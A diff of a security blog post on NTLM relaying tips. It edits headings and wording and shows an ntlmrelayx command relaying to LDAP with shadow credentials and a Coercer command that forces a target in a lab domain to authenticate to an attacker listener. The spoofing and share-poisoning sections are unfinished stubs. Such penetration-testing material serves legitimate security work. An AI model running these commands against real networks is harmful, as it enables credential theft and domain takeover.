Acebond/acebond.github.io/posts/2025-06-18-ntlm-relaying-tips-and-tricks.md

 ntlmrelayx.py -smb2support --shadow-credentials -t ldap://DC01.LAB.LOCAL
 ```

-6. Coerce Authentication from a WebClient Computer
+### Step 6: Coerce Authentication from a WebClient Computer
 ```bash
 coercer coerce --auth-type http -u 'lowpriv' -p 'password' -d 'LAB.LOCAL' -l hashleak -t TARGET.LAB.LOCAL
 ```

 # Coerced Authentication via Spoofing Attacks (LLMNR, NBT-NS, MDNS, DHCPv6 DNS takeover, ARP, etc.)
-A number of Windows and network protocols can be leveraged to misinformation a victim device performing a hostname query, this can leak to the victim device performing NTLM authentication to an attacker controlled hostname or IP address.
+A number of Windows and network protocols can be leveraged to misinform a victim device performing a hostname query, this can lead to the victim device performing NTLM authentication to an attacker controlled machine.

 - todo

 # Coerced Authentication via Share Poisoning (.lnk, .url, .library-ms, .searchConnector-ms, etc.)
-You can poison writable SMB shares with hash leak files, that when viewed in Windows Explorer (the directory content, not the file itself) the victim account with perform NTLM authentication to an attacker controlled hostname or IP address.
+You can poison writable SMB shares with hash leak files, that when viewed in Windows Explorer (the directory content, not the file itself) the victim account with perform NTLM authentication to an attacker controlled machine.

 - todo